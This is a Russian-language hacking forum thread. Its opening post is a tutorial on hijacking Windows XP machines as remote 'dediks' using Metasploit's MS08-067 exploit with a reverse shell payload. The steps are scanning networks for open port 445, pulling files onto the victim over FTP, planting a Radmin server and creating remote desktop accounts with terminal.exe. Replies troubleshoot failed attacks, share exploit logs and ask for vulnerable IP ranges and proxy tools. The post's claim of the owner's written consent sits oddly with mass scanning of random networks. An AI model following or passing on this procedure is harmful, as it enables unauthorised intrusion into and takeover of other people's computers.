![]() |
Дедик или поможет нам Metasploit 3.2
Начну с того порядком уже надоело читать как люди ищут дедик , просят их , я уже писал , что мы ходим по этим дедикам , проксям и тд и тп .
Сегодня мы рассмотрим метод добычи дедика по средством Metasploit 3.2 с эксплойтом MS08-067_netapi который использует уязвимость в службе SMB на 445 порту , уязвимы все Windows XP Pro sp2 и sp3 , скачать Metasploit 3.2 можно от сюда http://www.metasploit.com/ , теперь скачаем сканер портов , я использую ip angry версии 2.21 она мне больше почему нравиться , офсайт http://www.angryziber.com/w/Download , предположим что всё это мы уже скачали и установлил , запускаем сканер портов отметив в сканере порт 445 , именно он нам очень нужен , если просканировав сеть вы не увидели наличие открытого 445 порта в этой сети делать нечего , если же такой порт имеется то это очень даже хорошо ! http://stopxaker.ru/imeg/445.png Затем в Метасплойт в дальшейшем МС , находим эксплойт MS08-067_netapi жмём выполнить , http://stopxaker.ru/imeg/screen.png Выбор цели Автомат , Payloads =generic/shell_reverse_tcp в RHOST ip жертвы и жмём применить , если уязвимость существует вы получите шелл (cmd.exe) удалённого компьютера , а в окошке Sessions появиться ip жертвы http://stopxaker.ru/imeg/screen1.png Предположим что FTP сервер у нас установлен и настроен , в cmd пишем Код:
C:\>ftpPHP код:
http://stopxaker.ru/imeg/2.png Код:
get sys.exehttp://stopxaker.ru/imeg/3.png смотрим залит ли файл http://stopxaker.ru/imeg/4.png и запускаем его PHP код:
Теперь запустим RadminViewer и пробуем приконектится к нашему залитому и запущенному радмин-серверу http://stopxaker.ru/imeg/6.png Замечательно конект есть , вбиваем наш пароль и вот мы дома :D http://stopxaker.ru/imeg/7.png Теперь в радмине выбираем режим "Передачи файлов и загружаем наш terminal.exe , который сделает нам дедик на этом компьютере , хотя можно сделать учётки и в ручную PHP код:
Далее радмином в режиме "Телнет " запустим наш terminal.exe http://stopxaker.ru/imeg/9.png Затем "Подключение к удаленному рабочему столу" и пробуем приконектимся к нашему свежеиспечёному дедику http://stopxaker.ru/imeg/10.png Как видите на скрине показанно , что если мы сейчас нажём "ДА" то админа может выкинуть из свой сессии , и он может заподозрить что то не ладное в своей системе , как правило это может , повторяют может лечиться перезагрузкой компьютера , но помогает не всегда ! 50/50 http://stopxaker.ru/imeg/11.png Вы спросите почему я сразу не залил terminal.exe , отвечаю буквы в шелле отображаются кракозябрами и скорость в дедике сами понимаете , так что мне важно был залить радмина , а там уже дело техники Ну вот у нас есть дедик , на нём мы может установить прокси , фпт и многое многое другое , примерно в течении часа получилось 5 дедиков , я думаю это не плохо ! ps: Всё тут написанное не претендует на статью , теперь от себя хочу сказать следующие этот метод всё равно требует времени и терпения , если кто то хочет жать на кнопку "применить в Местаслойте" и чтобы он вам выкидвал готовые деды , ИДЕТЕ ЛЕСОМ , дабы не сказать грубей ! Подробно про Метасплойт и эксплойты можно почитать тут http://www.metasploit.com/ про Terminal.exe здесь http://forum.antichat.ru/thread36042.html Ну вроде теперь думаю отпадут вопросы , как и что , ищите сети со статистическими ip и дедиков будет в огромном количестве , а данной статейке лишний раз видно как уязвимы продукты Microsoft , поэтому я уже давно в качестве севера юзаю FreeBSD , а качестве десктопа Ubuntu (Linux Mint /etc) , думаю и другим пользователям пора уже сделать выводы !! В ходе эксперимента все данные пользователя не тронуты и на данное действие было дано его письменного согласие . источник stopxaker.ru |
скачал,жму в поиске MS08-067_netapi говорит нету((
|
Цитата:
|
Ето так должно или у меня чето нетак???
Установил запуснил отклылся СМД и бегут строки0_о минут так 5 уже0_о мне аж страшно))) если оно будет работать (метасплойт) выложу предложения как проще етим способом завладеть дедом) токо щас протестирую его) |
Цитата:
|
Цитата:
|
уже нашёл)всем спс.тока блин,уже полчаса сканю диапазоны - ни одного 445 порта...(
|
а если получил я шел как через него проксию установить???
или прогу какую кидать? |
мож ктонить подскажет диапазончик,где 445 есть?
|
Цитата:
http://vfose.hsdn.org/forum/viewtopic.php?f=8&t=266&sid=8b2e00d52d102173376fa7 c19e8bfead можно заюзать 3proxy http://3proxy.ru/download/ |
Цитата:
|
инфа хорошая,тока прога не качается от туда(
|
Цитата:
ну дурдом полный в аське такие вопросы задают что епанутся можно типо: Цитата:
Люди у вы все сидите в интеренете !!! у вас под носом www.google.com по всем вопросам к нему > туда в www.google.com |
нашел я тачки с портом 445
доходит до етого 23:53:58 - ms08_067_netapi[*] Triggering the vulnerability... и все((( вот приблезительно такое всегда 23:53:42 - ms08_067_netapi[*] Launching exploit windows/smb/ms08_067_netapi... 23:53:44 - ms08_067_netapi[*] Started reverse handler 23:53:46 - ms08_067_netapi[*] Automatically detecting the target... 23:53:57 - ms08_067_netapi[*] Fingerprint: Windows XP Service Pack 2 - lang:Russian 23:53:57 - ms08_067_netapi[*] Selected Target: Windows XP SP2 Russian (NX) 23:53:58 - ms08_067_netapi[*] Triggering the vulnerability... и все жду 5 мин ничего непроисходит( че делать? |
Цитата:
|
а и еще выбираю generic/shell_reverse_tcp
потому что generic/tcp/reverse shell ненашел( а етот похожый) |
:D жесть парни))))в поиске всё есть.
стопхакер,не качается прога по ссылке что дал лебедь (прокся там). кстати вот сдесь очень удобно смотреть диапазоны http://worldips.info/ |
|
проверил штук 20 айпи с открытым портом445 и пишет что то вроде этого "Exploit failed: The server responded with error: STATUS_OBJECT_NAME_NOT_FOUND (Command=162 WordCount=0)"
|
Цитата:
ps : Я делаю так , нахожу сеть, делаю в ней дедик , а потом уже из этого деда работаю с этой сетью . |
во я вроде нашел одного в сессии появляется его айпи нажимаю и открывается что то типа блокнота что делать?
|
Цитата:
|
Цитата:
|
но у меня неработают нечего dir, cd c: и т.д
|
гм... а реально вместо radmina заюзать netcat? o_O
|
Could not determine the exact service pack - что это значит?
|
Цитата:
|
Не может определить "версию" винды . Какой пак т.е.
|
СТАТЬЯ РУЛЕЦ
|
Цитата:
|
Делаю всё как написано
получаю 13:30:36 - ms08_067_netapi[*] Launching exploit windows/smb/ms08_067_netapi... 13:30:36 - ms08_067_netapi[*] Started reverse handler 13:30:39 - ms08_067_netapi[*] Automatically detecting the target... 13:30:51 - ms08_067_netapi[*] Fingerprint: Windows XP Service Pack 2 - lang:Chinese - Traditional / Taiwan 13:30:51 - ms08_067_netapi[*] Selected Target: Windows XP SP2 Chinese - Traditional / Taiwan (NX) 13:30:53 - ms08_067_netapi[*] Triggering the vulnerability... Это значит что нет уязвимости - или как ? |
неплохо.спс автору,сижу стёбаюсь на ламерами в локалке ^_^
|
если вечером буду трезв то может сниму видео как юзать ^_^
|
молодец не плохая статья
много скриншотов все доходчиво и по теме тока вот единственное Но это не описано как юзать сплойт под вин 2000 перезалейте тока прогу BHSocks5.v.1.1 |
вообщем такая проблема. Есть доступ к cmd , пытаюсь приконектится к фтп , спрашивает про юзера . Ввожу юзера и все - дальше висит. Не просит ни пароля , ничего. Как-бы залить файл по другому
|
Цитата:
Код:
net share c=c:> |
Цитата:
|
Дайте мне кто-то ответ на моё сообщение то шо выше. Если не трудно.
|
Цитата:
|
Так если всё правильно то - что дальше делать ?
Чего там где Ssesion не пявляеся IP ит дальше ? |
| Время: 22:54 |